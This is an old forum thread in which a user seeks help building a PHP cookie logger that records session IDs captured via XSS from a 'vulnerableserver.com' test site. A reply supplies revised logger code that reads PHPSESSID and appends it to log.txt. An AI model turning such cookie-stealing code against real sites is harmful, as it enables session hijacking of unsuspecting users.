|
Title: php script is not getting session cookie... Post by: wlandymore on April 13, 2012, 01:25:28 PM Hey, I've been working on this for a bit and I have a php file that I'm trying to redirect to a test server and then get the cookie with XSS basically.
My php file has: <?php header('Location: http://vulnerableserver.com/index.php?user1'); $cookie = INI_Get('session.cookie_httponly'); $date = date ("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt', 'a'); fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n"); fclose($file); ?> So it's writing everything else to the file but the cookie part just shows: COOKIE: and there is no sessionId, etc. I tried using other things like "session_Get_Cookie_Params()" but that just gave me: COOKIE: array If I go to the website and make a post that has a link for "alert('document.cookie')" then it spits the session ID out right away. How can I basically do the same thing only write it to the file? Title: Re: php script is not getting session cookie... Post by: BillV on April 13, 2012, 01:59:49 PM Well, for one, you likely need 'session_start();' at the top of your script to even have a PHP session.
Second, use the $_COOKIE variable to grab the session identifier if that's what you're after. I commented out your header redirect and cookie portions, rewrote with the above and echoed the session id (and your log.txt still works and writes the session ID in there). Code: <?php session_start(); //header('Location: http://vulnerableserver.com/index.php?user1'); //$cookie = INI_Get('session.cookie_httponly'); $cookie = $_COOKIE['PHPSESSID']; $date = date ("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt', 'a'); fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n"); fclose($file); echo $cookie; ?> Title: Re: php script is not getting session cookie... Post by: gromic on April 14, 2012, 03:51:39 AM Hi wlandymore,
ok this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your html file in a "server-context" meaning is it in your htdocs or do you just open it on your harddrive? Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happend to me too...an alertbox on the page worked however php script could't read cookies...). For "debuggin" try to throw both scripts in your htdocs ... and look if the php script gets the cookies... Don't know if this helps, was just a thought.... Cheers, -gromic Title: Re: php script is not getting session cookie... Post by: wlandymore on April 17, 2012, 12:55:00 PM Thanks. It was already in the htdocs and I also tried another hosted webserver but it wasn't working. Not sure what the issue is there but it just won't get the cookie. :'(
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |